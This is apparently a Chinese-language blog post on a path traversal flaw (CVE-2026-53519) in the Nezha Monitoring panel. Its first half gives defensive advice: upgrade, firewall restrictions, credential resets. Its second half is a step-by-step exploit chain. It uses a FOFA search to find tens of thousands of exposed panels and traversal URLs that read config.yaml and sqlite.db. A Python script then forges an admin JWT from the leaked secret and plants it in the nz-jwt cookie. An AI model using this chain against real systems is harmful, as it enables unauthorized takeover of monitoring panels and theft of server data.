哪吒监控(Nezha Monitoring)曝出高危严重漏洞(CVE-2026-53519,CVSS 评分9.1)原理研究及利用
近期哪吒监控(Nezha Monitoring)曝出高危严重漏洞(CVE-2026-53519,CVSS 评分9.1),所有2.0.13以下版本均受影响。该漏洞属于未授权路径遍历漏洞,黑客无需登录验证,即可远程读取服务器内核心配置、数据库等敏感文件,进而非法接管整个监控面板。
一旦遭到入侵,将造成账号数据泄露、服务器权限被盗、业务数据丢失,甚至引发合规处罚、经济损失等一系列风险。
为保障您的服务器与数据安全,请立即执行以下操作:
- 紧急升级:尽快将哪吒监控程序升级至官方修复版本 2.0.13 及以上,彻底封堵漏洞。
- 临时防护:暂无法升级的用户,可通过防火墙限制面板外网访问、配置IP白名单,阻断外部恶意攻击。
- 安全自查:升级后检查后台管理员账号、密钥信息是否异常,及时重置所有密码与通信密钥。
漏洞官方详情参考:
https://github.com/nezhahq/nezha/security/advisories/GHSA-5c25-7vpj-9mqh
https://nvd.nist.gov/vuln/detail/CVE-2026-53519
漏洞研究利用:
fofa 搜索 Nezha Monitoring
搜索结果:26,692条匹配结果(20,177 条独立IP )
打开访问路径:
http://xxxx:8008/dashboard../data/config.yaml
拿到密钥后,用 Python 快速伪造一个管理员 JWT:
import jwt
import time
secret = "泄露的密钥"
payload = {
"user_id": 1, # admin 通常是 uid=1
"username": "admin",
"role": "admin",
"iat": int(time.time()),
"exp": int(time.time()) + 86400 * 7 # 7 天有效期
}
token = jwt.encode(payload, secret, algorithm="HS256")
print(token)
将伪造的 Token 填入浏览器 Cookie (nz-jwt)或 Authorization Header,刷新面板页面,你已经拿到管理员最高权限了。
http://xxxx:8008/dashboard../data/sqlite.db
此次影响范围巨大, 非常可怕!